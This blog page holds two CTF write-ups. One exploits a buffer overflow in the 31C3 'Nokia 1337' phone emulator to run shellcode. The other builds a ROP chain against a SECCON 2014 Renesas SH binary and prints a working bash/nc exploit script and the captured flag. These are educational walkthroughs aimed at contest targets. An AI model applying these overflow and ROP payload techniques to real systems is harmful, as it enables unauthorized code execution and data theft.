Tuesday, December 30, 2014

31C3 CTF - Nokia 1337 (Pwn 30)

Here you are, playing a CTF with you mates in Hamburg. You notice there's a new task, “Nokia 1337”.
Enter the trilogy: pwn this phone. Please use only the qemu provided.
Remote instance requires proof of work: nc 188.40.18.78 1024
Connect locally via telnet to localhost:10023 after qemu booted completely.
You download the image, fire it up in Qemu and...

See the phone boot up on http://q3k.org/nokiaboot.webm
...Oh. Oh my.

Club Mate and Rum (it's called a Tschunk!) in hand, you give it a shot...

The challenge

The challenge is the first part of a trilogy of awesomeness prepared by the organizers of the 31C3 CTF. You were given a qemu machine that booted up into a Nokia-like ncurses interface. The machine was an emulated Xilinx Zynq ARM SoC. There was a low-privileged mobile user and a root user. The mobile user had the ncurses UI (a binary with DWARF debug symbols, phew) set as a shell. There was also a baseband communication coprocessor that was essential to solving the second and third parts of the challenge.

Locally, we could log in as root and see that there was a /home/mobile/flag file, containing placeholder text. Remotely, we could only access the ncurses UI via telnet. Obviously, we had to get remote code execution through the UI and read the flag.

The “phone” didn't have that much functionality. You can send and receive SMS messages, save, remove and retrieve contacts, and save, remove and use SMS templates. All storage was handled by an SQLite3 database.

The bug

As previously mentioned, the UI is a DWARF-enabled ARM binary. It's nonrelocatable, and has a writeable and executable data section. This makes our life easier.

After doing some analysis of the binary, I found an interesting function - db_get_template, which is used to retrieve a saved template from the database into a buffer. Why is it interesting? Well, let's take a look at its' signature:
Set sail for fail.
The index parameter is given by the caller to identify the ID of the template we want to retrieve. intidptr can be provided by the user to get information on the internal DB ID of the template. textptr is the output buffer address given by the caller. lenptr can be passed to receive the amount of data written to the buffer.

As you might've noticed, there isn't really a way for the caller to get the template length before calling the function - this looks bad. So, where is this function used? Well, when we wish to insert the template into our SMS. Here's the relevant code:
Iceberg, right ahead!
This is the code called when the user selects a template to be inserted into an SMS message. text, at 0x1C600, is a global buffer of the currently edited text message, text_len is a global int of the current text message length. How large is text, you ask?
Your shipment of fail has arrived,
 And since a template can also be 160 characters... Whoops! We have an overflow past the end of this buffer.

The exploit

Let's see what can we do with this. What's past this buffer? There's a 0x30-byte long structure named screen_input_dialog_arguments that contains data on how an input screen module should be called when inputting a number (when sending a message). While there's a few function pointers that we could overwrite there, there are also a whole bunch of pointers into complex structures. While doable, it's not something I'd like to have to fix up with my exploit in order to get one of the pointers called without crashing. Maybe there's a better attack vector?

Eww.

The next structure that we can overflow is screen_sms_write, a structure defining the callbacks that are called by the UI layer when we leave, enter, or input data in the SMS write screen. This looks promising! The first callback normally points to sms_write_enter, and is called when we enter the SMS write screen. So, in theory, we could overflow that pointer, leave the SMS text editor, re-enter it and then the code execution would jump wherever we want. Nice, let's try that.

Groovy, Baby! Yeah!
Let's say we make a 160-byte long template, with the last four bytes containing the address we want to write into the first callback at 0x1C6D4. Since the message buffer starts at 0x1C600, this means that our combined message+template text should have 216 bytes. Since the template is 160-bytes long, our message should be 56 bytes long. Here's what I did to test whether this attack works:

  • I created a new template, with 156 'B' characters and 4 'Z' characters. I saved it into memory.
  • I created a new message, with 56 'A' characters. I then inserted the previously crafted template at the end.
  • I exited the message editor and re-entered it.
  • I observed that the UI crashed.
So, we get a crash. If we attach GDB into the qemu stub and break around, we do indeed see a failed jump to 0x5A5A5A5A ('ZZZZ' treated as a pointer). So our smashing works!

Surprisingly, this was the easy part of the exploit. Now onto the hard part, especially if you're new to ARM exploitation....

Weaponization

We need a shellcode. Apparently, all public ARM shellcodes suck, especially if they can't contain 0x00, 0x0A, 0x1A, 0x1B and 0x1C characters. I ended up writing my own, and it's not very pretty:

'shiiii' is the sound I make each time I look at this.
The next step was to automate typing in the shellcode and other long strings into the UI. I wrote a proxy server in Python that would let me connect from a Telnet terminal and also trigger certain automated actions (typing in production token, credentials, template and SMS message). My final exploit looks like this:
  • Create a new template, with 156 'A' characters and 4 bytes of our shellcode address - 0x1C604. Remember, we can't send zeroes, so I had to add 4 to the message buffer address.
  • Create a new message with our shellcode, padded from the left with 4 'Z' characters, and from the right with enough 'Z' characters to make the whole thing be 56 bytes long. Now our shellcode is at 0x1C604 in memory.
  • Insert our template. Now we've overflowed 0x1C64, our shellcode address, into the sms_write_enter callback.
  • Exit the message screen, and re-enter it. Now we're executing our shellcode, which in turn dooes execve("/bin/sh\0", 0, 0).
  • Get flag.
  • ????
  • PROFIT
The final exploit code can be found at https://github.com/q3k/ctf/tree/master/31c3/nokia.

And here's a video of the pwn happening:


An excellent challenge and CTF overflow. Thanks CCCAC and StatumAuhuur for the challenge, and thanks fail0verflow and pasten for the fierce competition!

But there are two parts left.... stay tuned.

Thursday, December 11, 2014

SecCon 2014 - Japanese super micro-controller (exploitation 500)

As usual, when CTF tasks are marked with the exploitation tag, a binary file is made available and contestants are instructed to connect to a specific port on a specific IP in order to solve the challenge.

Executing the file command on the provided binary gives the following output:

$ file passcheck-sh 
passcheck-sh: ELF 32-bit MSB executable, Renesas SH, version 1 (SYSV), statically linked, stripped

If you are as old as I am :), then maybe you remember this Japanese company under name Hitachi, which developed its own CPU core called SuperH (SH). This is it; the company at some point sold the IP rights to Renesas, and we call this - now somewhat forgotten CPU architecture - Renesas SH. By the way, the predecessor of this CPU - SH-2 - was used as main CPU in some Sega consoles back in times.

Well, after a quick session with a search engine I managed to find both big- end little-endian SH emulators for Linux (in the qemu package), but further research revealed that the operating systems (user-lands) come in the little-endian flavor only and we have a big-endian binary. Bummer!

Having a working OS image would be a real help. In such case I would be able to debug the thing, and tests various stages of the exploit developed. Unfortunately, creating even a stub of OS (bash and friends) would take quite a lot of time, so I decided to simply use the little-endian flavor. And it turned out to be quite useful later on.

While booting the emulator, I opened the file in IDA-Pro, and took a look at the resulting disassembly stream. It was rather straightforward. I was able to rather quickly understand the meaning of basic assembler instructions (mov, jsr, rts, sts, lds, trapa, nop) and how the registers are utilized (e.g. r15 as SP). The only peculiar thing was the syscall execution procedure (function names are completely mine).

.text:00004054 syscall_write: .text:00004054 sts.l pr, @-r15 .text:00004056 mov r4, r1 .text:00004058 mov r5, r2 .text:0000405A mov r6, r7 .text:0000405C mov #4, r4 .text:0000405E mov r1, r5 .text:00004060 mov.l #maybe_syscall, r0 .text:00004062 jsr @r0 ; maybe_syscall .text:00004064 mov r2, r6 .text:00004066 lds.l @r15+, pr .text:00004068 rts .text:0000406A nop
...
.text:0000401C maybe_syscall: .text:0000401C .text:0000401C trapa #h'22 .text:0000401E rts

As you can see, the syscall value is passed in r4, while by reading the Linux kernel I found out that it should be r3. Also, arguments to syscalls are passed in r5, r6, r7 while in the vanilla Linux kernel it's r3 (syscall number), r4 (1st argument)... and so on.

In order to run a working binary (on a little-endian system) I had to modify it (i.e. the IDA-Pro assembler output) a bit before compiling with gcc. After this modification, the maybe_syscall took the following form:

maybe_syscall:
   mov r4, r3
   mov r5, r4
   mov r6, r5
   mov r7, r6

   trapa #0x17
   rts


Let's compile and run it:

$ gcc -Wl,-Tdata=0xffa000 pass.s -o pass -nostdlib
$ ./pass 
Input password: 

Voila!

BTW, the -Wl,-Tdata=0xffa000 flag is necessary, because the original binary used this memory chunk as a stack, by doing:

.text:00004000 _start: .text:00004000 mov.l #h'FFB000, r15 .text:00004002 mov.l #stage1, r1 .text:00004004 jsr @r1 ; stage1

Also, addresses of our binary will differ from the original one due to this modification so I didn't care about moving the .text secion to the address of 0x4000.

Ok, now we have a working binary, but it's incompatible (endianess). Still, it's very useful for testing. Typing a lot of ASCII characters (a typical first test) as a response to Input password: resulted in

$ ./pass 
Input password: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Segmentation fault

Is it our bug? We could read the output of IDA-Pro, but we can also (in absence of working gdb, which was simply crashing with any binary) use...

$ strace -e trace=none ./pass 
Input password: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
--- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x41414141} ---
+++ killed by SIGSEGV +++
Segmentation fault


Well, ok, the SEGV_MAPPER value can stand for at least a few things: unmapped address, bad permission bits, address execution fault, address fetch fault etc. So, reading output of the disassembler to confirm our assumptions is always a good idea. I did it (spent some time with annotating functions and trying to understand the execution flow), and yeah, that's out bug (buffer overflow on the stack and no ASLR/PIE/SSP).

Update: Later that day I realized that I could have used 'strace -i -e trace=none ./<binary>' to confirm that IP is set to 0x41414141.

Should be easy, right? Well.. not really, the stack is non-executable. Or, rather it is, but only under the qemu emulator and not while testing it on the CTF infrastructure (by creating a simple exploit, and compiling it under my SH emulator, which can, BTW, compile both for little- and big-endian CPUs).

So, were they using a real SuperH machine (Linux on Sega:)? Interesting. At this point the only one thing I could think of was, wait for it, ROP! :)

By using user version of the qemu-sh emulator (qemu-sh4) and testing it with AAAAAAAAAAAAAA..... input I realized that ip, r4, r5, r6 and r7 registers held my 0x41414141 values as well, which seemed awesome, because authors of the challenge basically must have given to us a ROP gadget which is preparing registers for syscalls. One of those gadgets is located here:

.text:0000424C mov.l @r15+, r7 .text:0000424E mov.l @r15+, r6 .text:00004250 mov.l @r15+, r5 .text:00004252 mov.l @r15+, r4 .text:00004254 lds.l @r15+, pr .text:00004256 rts
.text:00004254 lds.l @r15+, r8 (due to delayed branching
it will be executed as well!!!)

That's real gem! We can basically populate stack with data, and the code will simply load registers and call whatever function we like e.g. maybe_syscall (i.e. it will call any address, but we can redirect it to the maybe_syscall function by setting PR to a correct value).

There's only one thing that needs to be changed here though. If we did what I just described the maybe_syscall function will loop itself forever, because under SuperH the last return address is stored in the PR register and not on the execution stack. Therefore I had to jump trough a jsr/rts stub, which can be found here:

.text:00004028 mov.l #maybe_syscall, r0 .text:0000402A jsr @r0 ; maybe_syscall .text:0000402C nop .text:0000402E lds.l @r15+, pr .text:00004030 rts

To sum up our ROP: 0x00004028 (load registers), 0x00004028 (change PR register to a controlled value by doing jsr maybe_syscall, and return back to our gadget), 0x0000401C (our syscall invocation). The sequence of syscalls that I wanted to execute was:

open:
  • syscall_nr: 5
  • arg_1 = ptr to "flag.txt" (provided by me on the stack)
  • arg_2 = 0 (O_RDONLY)
  • arg_3 = irrelevant (not used with O_RDONLY)

read:
  • syscall_nr: 3
  • arg_1 = resulting file-descriptor (unknown to us at this point)
  • arg_2 = ptr to a free stack buffer (we can simply overwrite the "flag.txt" string here) - 0x00FFB02C
  • arg_3 = some numeric value, like 20 or 30 or so (number of bytes to read, roughly equal or greater than the expected flag size)

write:
  • syscall_nr: 4
  • arg_1 = 1 (stdout)
  • arg_2 = ptr to our buffer - in our case: 0x00FFB02C
  • arg_3 = some low-number value (number of bytes to write)


At this point I didn't know what file-descriptor number will the open syscall return. I assumed it's 3, but one never knows, so I chose to brute-force it :). The resulting shell-code is attached below: (admit it, bash haxxxoring is the best haxxxoring, python s..cks :). An alternative would be to invoke close(3) before calling open.

#!/bin/bash

while [ 1 ]; do
  for x in `seq 2 20`; do
A=`printf "%02x" $x`;
 
  echo == $A === >>/tmp/haslo;
{ echo -ne "\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xB0\x2C\x00\x00\x00\x05";
   echo -ne "\x00\x00\x40\x28";

   echo -ne "1111";
    echo -ne "\x00\x00\x42\x4C";
   echo -ne "\x00\x00\x00\x40\x00\xFF\xB0\x2C\x00\x00\x00\x$A\x00\x00\x00\x03";
   echo -ne "\x00\x00\x40\x28";

   echo -ne "1111";
   echo -ne "\x00\x00\x42\x4C";
   echo -ne "\x00\x00\x03\x00\x00\xFF\xB0\x2C\x00\x00\x00\x01\x00\x00\x00\x04";
   echo -ne "\x00\x00\x40\x28";

   echo -ne "flag.txt\x00";
   echo; } | nc -v micro.pwn.seccon.jp 10000 >>/tmp/haslo;
  done
done

After couple of iterations (because the resulting file-descriptor from the open syscall can be anything, and we need to match it with the second read syscall), the password will appear in /tmp/haslo :).

== 02 ===
Input password: flag.txt
== 03 ===
Input password: flag.txt
== 04 ===
Input password: flag.txt
== 05 ===
Input password: flag.txt
== 06 ===
Input password: SECCON{CakeOfBeanCurd}

== 07 ===
Input password: flag.txt